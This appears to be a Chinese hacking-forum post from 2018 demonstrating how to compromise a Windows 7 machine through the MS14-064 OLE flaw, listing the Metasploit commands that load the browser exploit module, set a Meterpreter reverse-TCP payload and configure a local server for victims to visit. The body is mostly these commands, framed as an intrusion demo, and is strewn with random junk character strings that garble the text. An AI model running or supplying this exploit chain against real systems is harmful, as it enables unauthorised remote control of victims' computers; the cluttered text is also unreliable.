找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1192|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

4 N4 \' ]+ m7 S 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 6 W& a2 W4 G& u) l7 Q

2 ~4 d( Q& y F" Z' X

3 k$ x% I; F# H5 G& i! v* H 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ( V' K; p( @4 Q, R/ z$ W

: \8 `! I- l) u3 D; p' F5 I% b

/ r2 S( H; D( u% P( _+ J3 @' f2 u0 I 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp. J- B& `9 N+ W: O

: v- U2 E( Q3 Z

8 e4 ?9 u' K& i             set AllowPowershellPrompt true: v* N" b9 y$ H2 X8 n6 M

7 F: _& i, O/ Y# `2 n2 M4 i

# m7 Y5 [" U: a" w% |             Set LHOST 192.168.0.109# p9 Z( C% n& ~/ f: ~) ]$ \' W8 I

7 \% \: {7 M5 d+ A

6 v. k' W4 X- Q5 W( r             set SRVHOST 192.168.0.109 ! z, k5 {, g, N2 y. y

+ m+ P/ ~( _5 J- I; l

# d1 M- \5 N3 C! U( C/ |/ R, D2 q             Set uripath share 8 W( {5 }& B; K* f# b4 o% ^

2 L9 S& l& K3 K) F2 X0 _% f3 y

( l- \' m" n/ x/ d             Set srvport 80 - i* t' _4 Y5 C- t+ N% R3 n

9 }, @2 ]+ o8 M* J% p

$ }+ ~) F. D( A# z: |; s" t   4 O, O5 E, q; w

" W. \4 @) H3 `9 C

3 Q7 K9 x3 Q5 O7 s8 u- J   5 y$ e5 x/ K9 x1 y9 ]# {; v

+ l4 X& k( o+ Z

- |: ?) b8 T/ V  + Q' E+ S" H: p$ J; k* R

8 s4 @% n! o9 u! ?

; u! v; t) V" G5 @   8 X, B- E5 D! A ^- H0 \ M

. l1 H+ m3 |4 I

/ s: A) T }" z% d" ?  . u6 y" n! Z( L& v9 I

, h2 t) _/ r. z9 {& m

/ i6 z1 E; v+ B7 M% N) z `2 b6 D 下面我们来访问本地地址如图:. Q2 e5 Q6 R2 |$ R

+ _6 V7 \5 K. u: @* `7 P

( z% C) n2 @8 g q- Y   4 N, N! ~; |/ T- K8 s8 Z

- ] v: L. E; K

. {. W6 Q" h) v% ^! C: M+ P   % |0 E. D( C' A3 J8 l/ k# l B

, D2 D+ H' L" N7 d( C( i2 `

4 F& E6 z: `. z6 I9 W * d5 a/ q( c' ^9 f, V+ O3 @5 H

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表